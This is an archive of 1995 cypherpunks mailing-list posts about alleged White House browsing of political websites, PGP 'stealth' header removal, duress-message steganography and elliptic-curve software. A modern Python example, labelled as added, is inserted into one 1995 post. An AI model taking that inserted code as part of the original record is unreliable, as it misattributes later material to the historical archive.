In-Reply-To: <9509121745.AA19687@toad.com>
Message-ID: <Pine.D-G.3.91.950912175508.23949D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Peter Trei wrote:

> > Finding the mail mixed in there is evidence that supports the "charge" 
> > but surely can be rebutted.  When I was practicing in a small town c. 
> > 1984, people would be summoned (sent a paper telling them to show up) to 
> > court for illegal dumping if their mail was found with other trash, old 
> > refrigerators, etc., in a creek somewhere.  Those charged could always 
> > put on proof that Billy Bob's garbage service picked up their trash ...
> 
> > The sentence was almost always to go and pick up some multiple of the 
> > garbage found and take it to the landfill.
> 
> This was Stockbridge, in MA, right :-?

No, it was in Western Kentucky with a week or two of a family's garbage 
and maybe a worn out appliance or two.  No garbage pickup provided by the 
county; private haulers expensive; dropping much at the landfill both 
inconvenient and "unnecessary" given the availability of hard to find 
valleys and creeks.

EBD

 
> 	        That's what we did, and drove back to the church, had a
> 	thanksgiving dinner that couldn't be beat, went to sleep and didn't
> 	get up until the next morning, when we got a phone call from officer
> 	Obie.  Said "Kid, we found your name on an envelope at the bottom of a
> 	half a ton of garbage, and just wanted to know if you had any
> 	information bout it". I said "Yes Sir Officer Obie, I cannot tell a
> 	lie, I put that envelope under that garbage."
> (c) Arlo Guthrie
> 
> 
>  
> 
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team                                
> Process Software Corporation
> http://www.process.com
> trei@process.com
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Sep 95 18:03:49 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <ac7b776f120210047e03@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I strongly agree with the views of  Phill Hallam-Baker and Brian Davis, and
perhaps others who make the same points, that access by the White House to
the various Web sites is NO BIG DEAL.

I go further: I have no concerns about the NSA reading _this_ list! After
all, it's a public list, so all are free to read it. Also, it may be very
useful for the Feds to be seeing what we are arguing.

We don't believe in "security through obscurity," do we? The notion that we
are "safe" if the White House, or (horrors!) Janet Reno herself, are not
reading our list or the Web sites on various issues, is the same kind of
security the ostrich thinks he has with his head in the sand and his butt
in the air.

If you want to be unheard by the Feds, and the White House, and the FBI,
and GCHQ, and Mossad, etc., then don't post publicly. If you want your
own access to Web sites kept private, push for the development of Web
proxies ("Web remailers").

And so forth. Security is in our own hands, as it should be (and as
"complex mathematics" has made it).

(In the U.S. and most Western countries--actually, an increasing number of
countries, worldwide--it is not easy to prosecute and convict a citizen for
mere views expressed, or for reading preferences, etc.. Although I am
thought of as a "crypto anarchist," and basically am such a thing, the fact
is that there aren't a lot of trials for thoughtcrime in this country. I
have some doubts about the circumstances surrounding Danny Casolaro's
death, though, so I don't say all is rosy and perfect. I just say that
paranoia that the White House or the FBI is reading public items is
unwarranted.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 14:56:35 PDT
To: an215712@anon.penet.fi
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509121717.AA03226@anon.penet.fi>
Message-ID: <Pine.D-G.3.91.950912180024.23949E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995 an215712@anon.penet.fi wrote:

> 
> - ----------------------------------------------------------
> 
>       WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET
>       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^!!!

Unbelievable!!!  To add to this distressing truth, I have learned that 
the White House also subscribes to a number of newspapers and periodicals 
which are reviewed for things of interest to the Administration and to 
the President. I I I I I I ammmmmmmmmm shocked!


Ooops.  Dog bites man.
And do you really think the White House couldn't hire a couple of net 
gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

EBD
 
> 
>     The  National  Security   Agency   presumably   can   monitor
> subversive  communication  on  the  Internet  without leaving any
> trace  by  "sniffing  packets"  at  traffic  nodes.  For   purely
> political  purposes, however, the White House may be forced to do
> the monitoring in-house,  which  means  that  they  leave  traces
> everywhere they go.
> 
>     With  just  a  superficial  search  for  such   traces,   The
> Washington   Weekly   has   uncovered   intensive  monitoring  of
> "dissident" Internet sites by the White House.
> 
>     It turns out that computers from inside the White House  have
> kept  pretty  good  tabs  on information available on Whitewater,
> Vince Foster, and Mena at a few key repositories  on  the  World-
> Wide Web, a subset of the Internet.
> 
>     Just  three  such  sites:  "The   Washington   Weekly,   "The
> Whitewater  Scandal  Home  Page" and "Whitewater & Vince Foster,"
> were accessed 128 times by  four  computers  from  the  Executive
> Office  of the President between August 28 and August 31.  If the
> White House is showing a similar interest in other sites  on  the
> World  Wide  Web,  that would amount to a monitoring operation of
> considerable magnitude. Tim Brady of the  Yahoo!  World-Wide  Web
> index  says  that his company alone has indexed approximately 725
> political  sites.  That  monitoring  effort  would  be   nothing,
> however,  compared  to  the  effort  required to follow all anti-
> Clinton discussion on the Usenet, another subset of the Internet.
> 
>     The White House did  not  respond  to  an  inquiry  (attached
> below)   asking  for  an  explanation  and  asking  whether  this
> constituted "casual browsing."
> 
>     Interestingly, the week after the  White  House  snooping  of
> files,  which included a series of articles by J. Orlin Grabbe on
> Vince Foster's ties  to  the  NSA,  the  following  little  piece
> appeared in Newsweek Magazine:
> 
>   "Conspiracy theorists perked up when Deborah Gorham told Senate
>   Whitewater investigators in June that her boss, the late deputy
>   White House counsel Vince Foster, asked her  to  put two secret
>   notebooks  from  the  National Security Agency in a White House
>   safe. The suggestion that  Foster  dealt  with  the NSA sparked
>   feverish  speculation  on the  Internet that he was involved in
>   espionage. The reality appears more prosaic.  The  White  House
>   won't give details,  but  sources say Foster's files dealt with
>   legal questions about national emergencies...."
> 
> 
>     Does the White House follow anti-Clinton discussion on Usenet
> newsgroups just as closely?  The White House posts press releases
> to Usenet in collaboration with the Artificial  Intelligence  Lab
> at   Massachusetts   Institute  of  Technology.  But  MIT  System
> Administrator Bruce Walton says that the White House does not use
> the  same  server  for  reading netnews.  It would be difficult -
> although not impossible - to find the server that the White House
> uses  for  reading  or  receiving netnews and check for traces on
> that server.
> 
>     Readers may be tempted to post a threat to the President on a
> newsgroup just to see if they get a visit from the Secret Service
> the next day. That experiment is not advisable. It is a  criminal
> offense.  But  Usenet  just might be a faster conduit for getting
> the attention of the administration than the email  address  that
> the White House has published for the president.
> 
> 
> 
> 
> 
> Attachment:
> 
> 
> 
>                       THE WASHINGTON WEEKLY
> _________________________________________________________________
> 
> August 31, 1995
> 
> Virginia M. Terzano
> White House Office of the Press Secretary
> The White House
> 
> 
> Dear Ms. Terzano:
> 
>     It has come to my attention that several dissident  sites  on
> the  World  Wide  Web  have been visited by White House computers
> this week.  Apparently,  all  information  regarding  Whitewater,
> Foster, and Mena has been transferred to White House computers.
> 
>     Specifically, the sites,  
> 
> "Washington Weekly" (http://www.federal.com),  
> "The Whitewater Scandal Home Page"
> (http://www.cs.dartmouth.edu/~crow/whitewater/)
> "Whitewater & Vince Foster" 
> (http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html)
> 
> have  been  visited  by  White  House   computers   ist1.eop.gov,
> ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
> 28 and August 31, and a total of 128 files have been  transferred
> to those White House computers. For all sites, this constitutes a
> significant  increase  over  previous  access  by   White   House
> computers.
> 
>     In light of this information, I have the following questions:
> 
> (1) Does this constitute "casual browsing" by White House staff, or
>     is it, in light of the considerable time and effort spent during 
>     regular business hours, part of a monitoring or intelligence operation?
> 
> (2) For what purpose is the information transferred to the White House used?
> 
> (3) Does the White House keep information from these web sites on file,
>     and does the White House keep a file on the persons responsible for
>     these web sites?
> 
> (4) Is the April 9 statement by David Lytel of the White House Office of
>     Science and Technology to Amy Bauer of Copley News Service that the
>     administration does not monitor anti-Clinton activity on the web still
>     operative?
> 
> 
>     Thank you very much for your cooperation in this matter.
> 
> Sincerely,
> 
> Marvin Lee
> The Washington Weekly
> 
> 
> 
> 
> Copyright (c) 1995 The Washington Weekly (http://www.federal.com)
> 
> 
> ----------------------------------------------------------------------------
> To find out more about the anon service, send mail to help@anon.penet.fi.
> If you reply to this message, your message WILL be *automatically* anonymized
> and you are allocated an anon id. Read the help file to prevent this.
> Please report any problems, inappropriate use etc. to admin@anon.penet.fi.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Remailing Service <nobody@armadillo.com>
Date: Tue, 12 Sep 95 16:22:50 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509122323.SAA23651@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


E. Brian sed:


>Unbelievable!!!  To add to this distressing truth, I have learned that 
>the White House also subscribes to a number of newspapers and periodicals 
>which are reviewed for things of interest to the Administration and to 
>the President. I I I I I I ammmmmmmmmm shocked!

mebbe tha Slickster just wants to know who orlin's "Deep Throat" is...
Keep checkin' them fingerprints, Willie!

>Ooops.  Dog bites man.
>And do you really think the White House couldn't hire a couple of net 
>gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

who sez they dont post, too?
heh





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 12 Sep 95 10:33:50 PDT
To: gjeffers@socketis.net
Subject: Re: Returned mail: User unknown
In-Reply-To: <199509121728.SAA16313@hermes>
Message-ID: <26561.9509121731@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



[whoops misspelled cpunks on cc line 1st time, sorry for 2 copies]

Perry Metzger <perry@piermont.com> wrote:
> Gary Jeffers <gjeffers@socketis.net> writes:
> >    Well, I just used MIT's PGP 2.6.2 with 3 different users' public
> > keys to encrypt 3 different files. In all 3 files, the first 3
> > characters were the same (an umlauted A, then an i with an up arrow
> > over it, and then a heart). This beginning 3 character string is
> > apparently the infamous PGP RSA signature. The signature that says
> > to spooks' programmed encryption sniffers - "HEY! I'M PGP -  GIVE ME
> > A LOOK!."
> 
> As if they couldn't figure it out anyway. It isn't an "RSA signature"
> by the way. Read format.doc sometime.

Yeah, that's what stealth does, removes the boiler plate stuff saying,
various things, such as pgp version number, rsa encrypted message,
conventional idea block, and as Perry says, it's all in pgformat.doc
in the PGP docs directory.

> >    When are the PGP designers and coders going to get serious and
> > develop STEALTH PGP inside PGP itself!?
> 
> Never, I hope. It would dramatically lower the utility of the
> system. Can you imagine how disgusting it would be to try decrypting
> something if you have a dozen keys outstanding? Not to mention how
> hard it would be to deal with figuring out that you should even try to
> decrypt things in the first place.

I reckon it would be a very nice utility, built into pgp as an
*option*, some countries it isn't legal to use PGP, and it hasn't been
ruled out that the US may not be the next to join the list, all this
GAK stuff, son of Clipper, it is a distinct possibility that the law
enforcement lot might outlaw other crypto with mandatory GAK.  Then
stealth features for PGP become important for incorporating into
stego, of course you can argue that well stealth should be part of the
stego app then.  It shouldn't be a problem unless it was enforced, as
an option I see no problem with it, and lots of possible future
advantages even.

I'm trying to work on stealth2.1, modifying Henry Hastur's stealth util
to add Hal Finney's algorithm for improving the stealthiness (it's
not enough to just strip the headers as stealth1.x does, the fact that
the RSA encrypted header is always < N, the rsa modulus gives the game
away with a few messages to analyse for statistical purposes, ie if
you see a lot of messages < N, where N is by definition not an even power
of 2, and possibly even N is known, or suspected from keyservers).

I've been delaying releasing it because I was worrying about ran no
generators being good enough, but I think I might have convinced
myself that it is not even necessary to use ran no generators, I'd
appreciate it if some folks with a bit of crypto expertise could cast
their eye over the description below.

> >   So what, -that "only a few companies" will be discovered to be using PGP
> > through the RSA signature!? Those few companies are the seeds for the
> > vast numbers of companies that would follow them in using PGP over the
> > Internet. The RSA signature is the flag that allows the spooks to easily
> > net the bold first companies. The RSA signature is greatly impeding the
> > spread of PGP use over the Internet. PGP MUST BE STEALTHED!!
> 
> It isn't an RSA signature. Its a bunch of magic numbers.
> 
> Look, get real already. If someone sees a bunch of random numbers in
> mail sent by me, its going to be pretty obvious what the hell is
> inside anyway.

Yeah, but you wouldn't do it that way.  I reckon this is what you'd do:

% pgp -es duress
% pgp -es msg
% stealth < msg.pgp > msg.stl
% cat msg.stl >> duress.pgp
% pgp +makerandom=1234 noise
% cat noise >> duress.pgp
% pgp -a duress.pgp
% mail someone < duress.asc

The pgp +makerandom=<size> <file> is an undocumented feature of pgp >
2.6 (not sure exactly when it got added, Colin Plumb pointed it out
when I asked him about ran nos for stealth).

So what this means is that you are using PGP itself to hide a
stegoed message.  This would be good for the guy from FACTnet
(forgotten his name) who just got hit by the CoS, he could hold out
for a while, then give up his key, the duress message would appear,
and the real message would be explained by having a script to do this
on his HD, and having long since burned the disk with a script to do
the above on it:

% pgp -es msg
% pgp +makerandom=4567 noise
% cat noise >> msg.pgp
% pgp -a msg.pgp
% mail someone < msg.asc

ie the idea is that you pad your message to a fixed size for the
express purpose of hampering traffic analysis (of the type of my,
Alice did have a lot to say to Bob that day).  It would be even better
cover if the thing had gotten sent through a remailer, as this kind of
thing is expected of type I remailer traffic (before mixmaster which
does the packetizing for you).

So the duress message really looks like this:

+---------+---------------------------+--------------------+--------+
| pgp hdr | IDEA encrypted duress msg | stealthed real msg | noise  |
+---------+---------------------------+--------------------+--------+

the IDEA block has a length field, but you can increase the length
without damage to include the following stealthed stuff as the
underlying stuff which is IDEA encrypted will know its length on
decryption, and the following junk will just be discarded.

So, Alice and her secret key ring (encrypted) gets nabbed by the
Charlie (CoS?), and coerced into divulging her passphrase.

And if and when it is noticed that the message was longer than it
ought to be (CoS that smart? substitute the NSA and they'd notice for
sure), Alice explains away the junk on the end by pointing them to the
fact that all of her messages were exactly (say) 16k long, and that
she was using the noise only script, and that the message really is
this:

+---------+---------------------------+-----------------------------+
| pgp hdr | IDEA encrypted duress msg | noise                       |
+---------+---------------------------+-----------------------------+

Now we come to arguments about why you might want this built-in to
PGP.  Well it provides plausible deniability as you have no extra
software which might look incriminating unless you managed to dispose
of it first, if it comes as stock.

Also the 2nd reason for built-in at least for stealth is if it needs
good random number source, but as I said, I'm not sure it needs a
random no generator.  So comments please, this has been around a few
times already, but here's the algorithm for manipulating x which is
the RSA encrypted component of the header of an RSA+IDEA encrypted PGP
message:

(this is a description of my implementation of Hal's algorithm as
described on his www page: http://www.portal.com/~hfinney/):

consider random no x, RSA modulus N

	1 < x < N

(that used to say 0 <= x < N, but 0, and 1 being RSA fixed points, 0,
1, and N won't be generated by PGP presumably?  I think this shouldn't
matter as the keyspace of N is so large that the probability of a 0 or
a 1 specifically is nothing to worry about I think.)

Hal's algorithm was to convert x to being in the range:

	0 <= x' < lim

where lim which is the next power of 2 above N * 2^surety, and surety
is 64, 64 seems big enough?

The recover operation is:

	x = x' mod N

and the create operation is:

1) scale = int( (lim-1) / N ) + 1

2) scale2 = 2^int( log2( scale ) + 1) 

	ie scale2 = next power of two over scale

3) r = MD5( 0, x ) 

	ie MD5 digest of x, as x is an RSA encrypted random session
	key misc other info, and more random padding to bring up to
	be close to N in size.  It strikes me that we already have 
	a random number, and that provided MD5 can not be inverted
	(which it is not possible, as it is compressing, and loses
	info, and the brute force to find which of all the possible
	y's (0 < y < N) MD5 digests come out to be x.

	I would have thought it likely that this would be evenly
	distributed, and that the cost would be enormous?

4) r = MD5( r, rand() )

	it will fail some of the time, so in this
	case repeat with another random number, I stirred it in first
	but perhaps you would only do it if it failed.  Or perhaps it
	is enough to MD5( r, r ) ie stir r into itself to generate
	another ran no?  So long as there are no rare cycles?
	Presumably either impossible or infinitesimally small
	probability.


5) r = r mod scale2
	
6) if (r > scale) goto 4)

	4),5) & 6) are designed to generate an evenly distributed
	random number in the range:

		0 <= r <= scale

7) x' = N * r + x

8) if (x' > lim) goto 4)



an example, with small numbers, and surety set to 8, x = 7, and
manufacturing the ran nos manually:

lim = 2^( int( log2(N) + 1 ) + surety )
    = 2^( 4 + 8 ) = 4096

1) scale = int( 4096 / 13 ) + 1 = 316

2) scale2 = 2^( int( log2( scale ) ) +1 ) = 2^(8 + 1) = 512
          
3) say MD5( x ) = 0x00000000000000000000000000001234

4) say MD5( x, rand ) = 0x00000000000000000000000000001235 = 4661 (base 10)

5) r = 4661 mod scale2 = 4661 % 512 = 53

6) if ( 53 > 315 ) - it's not

7) x' = N * r + x = 13 * 53 + 7 = 696

8) if (696 > 4096) - it's not

so x' = 696

reversing:

x = x' mod N = 696 mod 13 = 7


when 6) is true, ie r > scale which will happen half the time on avg
with the first ran no, and so on like a coin flip, the chances of many
coins flipping the wrong way diminishes rapidly with number of flips.

when 8) is true, ie x' > lim, x' can only be > than lim when x = N - 1, 
and given that x = N - 1, the probability is less of x being in 

	N * scale <= x < lim

but this will only occur with probability:

       1         1
    -------- < -----
    2^surety   scale

I think.  So you'd have to collect one mess of messages to even catch
one sample, let alone enough messages to have a statistical proof of
steganography being present.


Pls check the maths a bit, the above describes the software
implementation of Hal's algorithm which he has on-line, on his page:

	http://www.portal.com/~hfinney/

But the main question I'd like to get verification on is if it is safe
to use the MD5 of the RSA encrypted message to perform the operation.

I'm essentially doing:

	x' = N * f(MD5(x)) + x

where f(y) is a function which converts from range 0 <= y < 2^128 to a
range 0 <= f(y) < scale.

Is that safe?

x is random, and will be different even for a repeat encryption of the
same file, as PGP is using a random IDEA session key.

So are there any brute force attacks on that which would be cheaper
than attacking 128 bit IDEA?  PGP's random number generator also makes
extensive use of MD5, so I'm taking the use of MD5 as secure as a
given.

If it is thought to be dangerous for some reason (it is after all some
kind of signature on itself, presume that you know N, and x' but
not x, the question is can the equation be brute force reversed in a
less than 128 bit brute force attack.  I'm neglecting to consider the
rand() calls, which I'm not expecting to add security, but are just a
mechanism to stir the value with to get more random nos, as
occasionally the algorithm needs more than one, if the first fails,
etc.

If people reckon it's insecure, then it would be ideal to include the
stealth functionality into PGP, so that integral use of PGPs ran no
routines can be made.  I was previously using an MD5 digest of PGPs
randseed.bin for this, but you can't stir it (well you could but that
would be considered a security risk diddling with PGPs files), and not
stirring means you have no improvement over the above, in the event
that your system is captured with the known plaintext.  If you
stirred it there would be no proof of that being the message in the
file.  Even unstirred, if the N * f(MD5(x)) + x is no good, the
inclusion of a digest of the randseed.bin would be a big improvement.

It seems rather messy to have all of the keyboard sampling stuff, for
PGP keys duplicated for this.  Hope the x' = N * f(MD5(x)) + x
construct is secure as this will avoid the issue.

Adam
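
The create and recover operations from the post above, as an added Python example (not part of the original message and not the stealth2 source); it reproduces the post's small-number case and also shows what an observer holding the public modulus N can check when r is derived from x with no secret randomness (the MD5(r, r) variant the post considers). Assumptions: the function names, the byte encoding fed to MD5, the constructed modulus DEMO_N, and the use of >= rather than > in steps 6 and 8 so that r < scale and x' < lim.

```python
import hashlib
import secrets

# Constructed demo modulus (product of two Mersenne primes), not a real PGP key.
DEMO_N = (2**127 - 1) * (2**89 - 1)


def md5_int(*parts: bytes) -> int:
    """128-bit MD5 digest of the concatenated parts, as an integer."""
    return int.from_bytes(hashlib.md5(b"".join(parts)).digest(), "big")


def limits(n: int, surety: int = 64):
    """Return (lim, scale, scale2) as defined in steps 1 and 2 of the post."""
    lim = 1 << (n.bit_length() + surety)   # 2^(int(log2(N) + 1) + surety)
    scale = (lim - 1) // n + 1             # step 1
    scale2 = 1 << scale.bit_length()       # step 2: next power of two over scale
    return lim, scale, scale2


def random_stir(state: int) -> int:
    """Step 4 with fresh randomness, modelled as MD5(r || 16 random bytes)."""
    return md5_int(state.to_bytes(16, "big"), secrets.token_bytes(16))


def self_stir(state: int) -> int:
    """The MD5(r, r) alternative from the post: no secret input at all."""
    b = state.to_bytes(16, "big")
    return md5_int(b, b)


def stealth_create(x: int, n: int, surety: int = 64,
                   stir=random_stir, max_tries: int = 1000) -> int:
    """Map x (1 < x < N) to x' = N*r + x with 0 <= x' < lim."""
    if not 1 < x < n:
        raise ValueError("need 1 < x < N")
    lim, scale, scale2 = limits(n, surety)
    if scale2 > 1 << 128:
        raise ValueError("scale2 exceeds what a 128-bit digest can cover")
    state = md5_int(x.to_bytes((x.bit_length() + 7) // 8, "big"))  # step 3
    for _ in range(max_tries):
        state = stir(state)        # step 4
        r = state % scale2         # step 5
        if r >= scale:             # step 6 (the post writes r > scale)
            continue
        x_prime = n * r + x        # step 7
        if x_prime >= lim:         # step 8 (the post writes x' > lim)
            continue
        return x_prime
    raise RuntimeError("no acceptable r found")


def stealth_recover(x_prime: int, n: int) -> int:
    """The recover operation: x = x' mod N."""
    return x_prime % n


def linkable_to_key(x_prime: int, n: int, surety: int = 64) -> bool:
    """True if x' is exactly what the self_stir variant emits for modulus N.

    Needs only public values: x = x' mod N, then the deterministic
    multiplier is recomputed and compared with the observed one.
    """
    x = x_prime % n
    if not 1 < x < n:
        return False
    return stealth_create(x, n, surety, stir=self_stir) == x_prime


if __name__ == "__main__":
    # The post's example: N = 13, surety = 8, x = 7, digest forced to 0x1235.
    print(stealth_create(7, 13, 8, stir=lambda s: 0x1235))
    x = md5_int(b"constructed session-key block")
    print(linkable_to_key(stealth_create(x, DEMO_N), DEMO_N))
    print(linkable_to_key(stealth_create(x, DEMO_N, stir=self_stir), DEMO_N))
```

With random_stir the multiplier cannot be recomputed from x' and N, so the check returns False except with probability about 1/scale; with self_stir it always returns True for the matching modulus.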





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 12 Sep 95 11:00:12 PDT
To: gjeffers@socketis.net
Subject: PGP duress code, and stego (was Re: PGP in UK - snooped unSTEALHed?)
Message-ID: <26623.9509121759@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



erm darn, I posted a huge post which should have the above subject,
but instead came out with the subject line:

Re: Returned mail: User unknown

due to typo, could someone replying please correct that, if following
up, I won't bother posting it again in respect of those who actually
pay for their mail feed per k.

It had a lot of questions which I'd really like people to look at,
skip back a few, and take a read, it's for the implementation of
stealth2, Henry Hasturs stealth util.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Tue, 12 Sep 95 10:02:58 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
Message-ID: <v01510100ac7a4e673a66@[193.74.217.13]>
MIME-Version: 1.0
Content-Type: text/plain


>intercepts requested and authorized in the past year.  As I recall, the
>number was quite small - around 12K [?].  Someone had found this out
>through an FOIA request, perhaps, (my recollection of it is poor). It was

I think it's about 1200.

>not a large number, anyway.  I must conclude that the actual number of
>intercepts is much, much larger than they are saying, and that they must
>be getting what they perceive to be good intel from all this snooping.
>

A more cautious conclusion would be that the importance (to the
LEA's) of the busts made with crypto is much larger than the numbers
suggest.  You could interpret that a lot of ways:  I suspect that
high-profile career-enhancing cases are highly dependent on wiretaps.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Tue, 12 Sep 95 09:17:52 PDT
To: danisch@ira.uka.de
Subject: Re: Elliptic Curve Public Key Crypto available
In-Reply-To: <9509121500.AA03172@elysion.iaks.ira.uka.de>
Message-ID: <199509121617.TAA06025@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> Available anywhere outside the escrowed country ?

See http://www.cs.hut.fi/crypto/software.html#eliptic

It was in Italy (ftp.dsi.unimi.it) earlier today...

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 12 Sep 95 16:19:43 PDT
To: cypherpunks@toad.com
Subject: new info-sec mailing list
Message-ID: <9509122318.AA13685@all.net>
MIME-Version: 1.0
Content-Type: text


	Info-sec heaven is introducing a new mailing list.  Unlike many
of the Internet's mailing lists, this is not an open forum for people on
the Internet to exchange ideas.  Rather, it is a monthly mailing used to
inform readers of new information that can be found in info-sec heaven. 

	If you would like to be informed of new information, services,
search capabilities, protection software, articles, books, and other
information that appears in info-sec heaven without having to come in
periodically and look for yourself, please let us know by sending email
to fc@all.net and we will add you to our monthly list. 

	Thank you for your time.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 12 Sep 95 16:23:36 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509121717.AA03226@anon.penet.fi>
Message-ID: <9509122322.AA22126@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hang on a sec, what is meant to be the conspiracy?

I don't see any relationship to cryptography here. The material in question was 
published very publicly. If you make a public statement about a person then 
they have a right to hear it. I see that the message on log file confidentiality 
is not getting through though.


I happen to know that the US government is very interested in hearing the views 
of its citizens, and also the views of citizens of other countries. They are 
interested in particular about views relating to the actions of the US 
government, what the government is doing and what it could do. "anti-president 
views" are of great importance if it is known why those views are held.

In my country we call that listening. I have just spent a couple of days talking 
with a group of people looking at how we can do that better. There is a 
considerable barrier to being involved in the political process, perhaps the Web 
can reduce that barrier. The problem being how to handle the massive amounts of 
input.


>    Readers may be tempted to post a threat to the President on a
>newsgroup just to see if they get a visit from the Secret Service
>the next day. That experiment is not advisable. It is a  criminal
>offense.  

DO NOT DO THIS.

The secret service is required by law to investigate every single threat. This 
costs a very considerable amount of money which comes from your taxes. There is 
no discretion in the matter. Hence the only method of reducing the number of 
alarms is to arrest people and make an example of them. Unless you want to be 
the example do not do this.


>have  been  visited  by  White  House   computers   ist1.eop.gov,
>ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
>28 and August 31, and a total of 128 files have been  transferred

I don't know which those machines are, however there are a large number of Web 
browsers in the Whitehouse and there are a large number of staffers. There is 
also a Web browser outside the oval office for visitors to use while they are 
waiting. If you make it your business to print nasty material about people then 
don't be surprised if they read it. The material has probably been picked up by a 
search engine in any case.


There is no conspiracy here unless you are very determined to find one. Given 
the nature of the article it does not appear that a balanced view of the 
administration was being sought in any case. I happen to know that Newt 
Gingrich's staffers and Weld's staffers also surf the Web, are they "monitoring 
anti-Newt dissidents?", I suspect not. I don't get the impression that our 
anonymous source has sent a complaint in that direction. I spend a considerable 
amount of time getting people in power to listen to the net community. I get 
very pissed off when a bunch of conspiracy nuts try to make out that they have 
been doing anything wrong when they do.


As a matter of ethics I consider information in log files private. This was 
certainly considered to be the case in the Marty Rimm affair. The posting was 
clearly designed to intimidate the Whitehouse staffers into not visiting those 
sites, it was possible that they might have lost their net.access entirely as a 
result of the complaint. I consider the letter sent to Terzano to be unethical 
since the staffers had a right to expect their privacy to be preserved.


If people want to talk about cryptography and the President we can discuss 
whether he should put a digital signature on his press releases.


I think the use of the word dissident in the message is an insult, both to the 
dissidents in the Eastern Europe and other places who have suffered genuine 
persecution and to the democratic institutions and people of the United States.


		Phill Hallam-Baker

Not speaking for anyone else.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@Mars.mcs.com>
Date: Tue, 12 Sep 95 17:34:40 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Elliptic Curve Public Key Crypto available
In-Reply-To: <9509121658.AA00550@ch1d157nwk>
Message-ID: <Pine.3.89.9509121934.A15499-0100000@Mars.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 12 Sep 1995, Andrew Loewenstern wrote:

> What about NeXT's Fast Elliptic Encryption (FEE)?  Their research guy,  
> Richard Crandall, came up with major speedups to elliptic curve encryption.   
> In fact, there was a simple cryptosystem that shipped as a demo with NeXTSTEP  
> 2.0.  What was most interesting about this system was that it didn't store  
> any keys anywhere;  your public/private key pair was generated _on the fly_  
> from your passphrase every time you encrypted or decrypted....on a 25mhz  
> 68040 too...   and it was fast!  It wasn't that great of an implementation  
> (you _really_ need a lot of bits of entropy in that passphrase, and you can't  
> change your passphrase without changing your PK), but it shows how fast  
> NeXT's speedups are.  And this was in 1990...
> 
> I'm not sure if the speedups are patented, but you could try a literature  
> search.  If it really is fast then it could mean good things for servers that  
> need to do a lot of encryption/decryption for interaction with clients.

Yes, the speedups are patented.  Their system relied on very specific 
curves with very specific properties.  I purposely avoided coding up their 
method because of that.  Their method is described in patent #5,159,632 
dated Oct 27, 1992 and it uses a different equation (supersingular 
version) than what I implemented.  The price is slower speed, but with 
100 MHz processors you won't notice.

Patience, persistence, truth,
Dr. mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Sep 95 17:32:40 PDT
To: A5113643667@attpls.net (Tom Jones)
Subject: No Subject
In-Reply-To: <D71D5F23>
Message-ID: <199509130032.UAA16308@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Jones writes:
> The ones I've heard about are SKIP, Photurus and ISAKMP(sp?).

ISAKMP is really a metaprotocol, and SKIP doesn't fit the IPSP model
well -- it never was much of a candidate...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
